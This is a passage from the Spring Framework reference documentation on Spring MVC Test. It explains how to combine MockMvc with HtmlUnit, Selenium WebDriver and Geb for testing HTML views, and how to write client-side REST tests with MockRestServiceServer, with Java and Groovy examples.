you are using JSPs you can verify the JSP page to which the request was\nforwarded, but there won't be any HTML rendered. In other words, the JSP will not be\n_invoked_. Note however that all other rendering technologies which don't rely on\nforwarding such as Thymeleaf and Freemarker will render HTML to the response body as\nexpected. The same is true for rendering JSON, XML, and other formats via `@ResponseBody`\nmethods.\n\nAlternatively you may consider the full end-to-end integration testing support from\nSpring Boot via `@WebIntegrationTest`. See the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].\n\nThere are pros and cons for each approach. The options provided in __Spring MVC Test__\nare different stops on the scale from classic unit testing to full integration testing.\nTo be certain, none of the options in Spring MVC Test fall under the category of classic\nunit testing, but they _are_ a little closer to it. For example, you can isolate the web\nlayer by injecting mocked services into controllers, in which case you're testing the web\nlayer only through the `DispatcherServlet` but with actual Spring configuration, just\nlike you might test the data access layer in isolation from the layers above. Or you\ncan use the standalone setup focusing on one controller at a time and manually providing\nthe configuration required to make it work.\n\nAnother important distinction when using __Spring MVC Test__ is that conceptually such\ntests are on the _inside_ of the server-side so you can check what handler was used,\nif an exception was handled with a HandlerExceptionResolver, what the content of the\nmodel is, what binding errors there were, etc. That means it's easier to write\nexpectations since the server is not a black box as it is when testing it through\nan actual HTTP client. This is generally an advantage of classic unit testing, that it's\neasier to write, reason about, and debug but does not replace the need for full\nintegration tests. At the same time it's important not to lose sight of the fact that\nthe response is the most important thing to check. In short, there is room here for\nmultiple styles and strategies of testing even within the same project.\n\n\n[[spring-mvc-test-server-resources]]\n===== Further Server-Side Test Examples\nThe framework's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples[many\nsample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples\nfor further ideas. Also the\nhttps:\/\/github.com\/spring-projects\/spring-mvc-showcase[spring-mvc-showcase] has full test\ncoverage based on Spring MVC Test.\n\n\n[[spring-mvc-test-server-htmlunit]]\n==== HtmlUnit Integration\n\nSpring provides integration between <<spring-mvc-test-server,MockMvc>> and\nhttp:\/\/htmlunit.sourceforge.net\/[HtmlUnit]. This simplifies performing end-to-end testing\nwhen using HTML based views. This integration enables developers to:\n\n* Easily test HTML pages using tools such as http:\/\/htmlunit.sourceforge.net\/[HtmlUnit],\nhttp:\/\/seleniumhq.org\/projects\/webdriver\/[WebDriver], &\nhttp:\/\/www.gebish.org\/manual\/current\/testing.html#spock_junit__testng[Geb] without the\nneed to deploy to a Servlet container\n* Test JavaScript within pages\n* Optionally test using mock services to speed up testing\n* Share logic between in-container end-to-end tests and out-of-container integration tests\n\n[NOTE]\n====\n`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,\nThymeleaf, FreeMarker, etc.), but it does not work with JSPs since they rely on the Servlet\ncontainer.\n====\n\n[[spring-mvc-test-server-htmlunit-why]]\n===== Why HtmlUnit Integration?\n\nThe most obvious question that comes to mind is, \"Why do I need this?\". The answer is best\nfound by exploring a very basic sample application. Assume you have a Spring MVC web\napplication that supports CRUD operations on a `Message` object. The application also supports\npaging through all messages. How would you go about testing it?\n\nWith Spring MVC Test, we can easily test if we are able to create a `Message`.\n\n[source,java]\n----\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t.param(\"summary\", \"Spring Rocks\")\n\t.param(\"text\", \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t.andExpect(status().is3xxRedirection())\n\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nWhat if we want to test our form view that allows us to create the message? For example,\nassume our form looks like the following snippet:\n\n[source,xml]\n----\n<form id=\"messageForm\" action=\"\/messages\/\" method=\"post\">\n <div class=\"pull-right\"><a href=\"\/messages\/\">Messages<\/a><\/div>\n\n <label for=\"summary\">Summary<\/label>\n <input type=\"text\" class=\"required\" id=\"summary\" name=\"summary\" value=\"\" \/>\n\n <label for=\"text\">Message<\/label>\n <textarea id=\"text\" name=\"text\"><\/textarea>\n\n <div class=\"form-actions\">\n\t<input type=\"submit\" value=\"Create\" \/>\n <\/div>\n<\/form>\n----\n\nHow do we ensure that our form will produce the correct request to create a new message? A\nnaive attempt would look like this:\n\n[source,java]\n----\nmockMvc.perform(get(\"\/messages\/form\"))\n\t.andExpect(xpath(\"\/\/input[@name='summary']\").exists())\n\t.andExpect(xpath(\"\/\/textarea[@name='text']\").exists());\n----\n\nThis test has some obvious drawbacks. If we update our controller to use the parameter\n`message` instead of `text`, our form test would continue to pass even though the HTML\nform is out of synch with the controller. To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! Of course, this violates the _DRY Principle_; so\nwe should ideally extract this code into its own method as follows.\n\n[source,java]\n----\npublic HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {\n\tsetSummary(currentPage, summary);\n\t\/\/ ...\n}\n\npublic void setSummary(HtmlPage currentPage, String summary) {\n\tHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\n\tsummaryInput.setValueAttribute(summary);\n}\n----\n\nThis ensures that we do not have to update all of our tests if we change the UI.\n\nWe might even take this a step further and place this logic within an Object that\nrepresents the `HtmlPage` we are currently on.\n\n[source,java]\n----\npublic class CreateMessagePage {\n\n\tfinal HtmlPage currentPage;\n\n\tfinal HtmlTextInput summaryInput;\n\n\tfinal HtmlSubmitInput submit;\n\n\tpublic CreateMessagePage(HtmlPage currentPage) {\n\t\tthis.currentPage = currentPage;\n\t\tthis.summaryInput = currentPage.getHtmlElementById(\"summary\");\n\t\tthis.submit = currentPage.getHtmlElementById(\"submit\");\n\t}\n\n\tpublic <T> T createMessage(String summary, String text) throws Exception {\n\t\tsetSummary(summary);\n\n\t\tHtmlPage result = submit.click();\n\t\tboolean error = CreateMessagePage.at(result);\n\n\t\treturn (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));\n\t}\n\n\tpublic void setSummary(String summary) throws Exception {\n\t\tsummaryInput.setValueAttribute(summary);\n\t}\n\n\tpublic static boolean at(HtmlPage page) {\n\t\treturn \"Create Message\".equals(page.getTitleText());\n\t}\n}\n----\n\nFormerly, this pattern is known as the\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageObjects[Page Object Pattern]. While we can\ncertainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the\nfollowing sections to make this pattern much easier to implement.\n\n[[spring-mvc-test-server-htmlunit-webdriver-setup]]\n====== MockMvc and WebDriver Setup\n\nTo use Selenium WebDriver with the Spring MVC Test framework, make sure that your project\nincludes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.\n\nWe can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the\n`MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-webdriver-usage]]\n====== MockMvc and WebDriver Usage\n\nNow we can use WebDriver as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttps:\/\/seleniumhq.github.io\/selenium\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory#making-the-example-work-using-annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/Getting-Started[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny unrecognized method calls or property accesses\/references that are not found will be\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define a URL in which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/#the-jquery-ish-navigator-api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess());\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We could define as additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of testing `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder(true).build();\n----\n\nEven with unordered requests by default each request is allowed to execute once only.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, then that order only applies to the first of\nany expected request. For example if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\"\nbut aside from that subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching 